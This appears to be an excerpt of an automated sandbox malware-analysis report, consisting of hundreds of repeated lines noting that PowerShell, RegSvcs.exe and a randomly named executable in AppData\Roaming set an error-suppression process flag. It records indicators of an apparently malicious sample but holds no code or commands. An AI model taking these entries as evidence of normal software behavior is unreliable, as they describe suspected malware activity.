                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
